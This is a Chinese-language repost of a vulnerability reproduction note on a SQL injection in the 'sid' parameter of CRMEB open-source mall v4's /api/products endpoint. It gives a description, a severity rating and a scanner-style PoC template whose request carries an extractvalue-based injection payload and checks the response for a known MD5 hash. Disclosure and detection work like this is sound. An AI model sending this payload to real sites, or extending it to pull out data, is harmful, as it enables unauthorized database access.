您的位置:首页 > 娱乐 > 明星 > 漏洞复现-CRMEB 开源商城 sid 参数 SQL 注入漏洞

漏洞复现-CRMEB 开源商城 sid 参数 SQL 注入漏洞

2025/2/25 6:14:07 来源:https://blog.csdn.net/xuandao_ahfengren/article/details/141123378  浏览:    关键词:漏洞复现-CRMEB 开源商城 sid 参数 SQL 注入漏洞

1.漏洞描述

CRMEB打通版v4是免费开源商城系统,UINAPP+thinkphp6框架商城.CRMEB打通版/api/products路径下的sid参数存在未经过滤的SQL语句拼接导致SQL注入。

攻击者除了可以利⽤ SQL 注⼊漏洞获取数据库中的信息(例如,管理员后台密码、站点的⽤户个⼈信息)之外,甚⾄在⾼权限的情况可向服务器中写⼊⽊⻢,进⼀步获取服务器系统权限。

请关注厂商的修复版本,并及时更新到最新版本。

2.漏洞背景

漏洞类型:SQL注入

威胁等级:高危

披露日期:2023/10/9

Exp:暂无

3.影响范围

4.poc

relative: req0
session: false
requests:
method: GET
timeout: 10
path: /api/products?page=1&limit=8&keyword=keyword&sid=extractvalue(1,concat(char(126),md5(118)))&news=0&priceOrder=&salesOrder=
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/80.0.374.113 Safari/537.36
follow_redirects: false
matches: (code.eq("200") && body.contains("5ef059938ba799aaa845e1c2e8a762b"))

是使用extractvalue()函数从数据库中提取数据,并检查提取的数据,当与MD5进行哈希时,是否与特定的哈希值匹配。在这个PoC中,extractvalue()函数用于将波浪号(~)与数字118的MD5哈希连接起来。如果响应体中找到了结果MD5哈希(5ef059938ba799aaa845e1c2e8a762b),则证实了此漏洞。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

最新新闻

热搜词

Day 49 卡玛笔记 项目管理指导委员会是什么意思? 解决Docker连接XQuartz报错 Spherical Linear Interpolation and Text-Anchoring for Zero-shot Composed Image Retrieval SVG_APF_DSP+FPGA整机完整成熟代码 城乡百姓平台的优势

声明:本站所有新闻及新闻图片来源于其他网站,如有侵权,请及时联系我们!

客户服务 | 关于我们 | 版权声明

版权所有:

Copyright 2024 尧图网 All Rights Reserved.QQ:809451989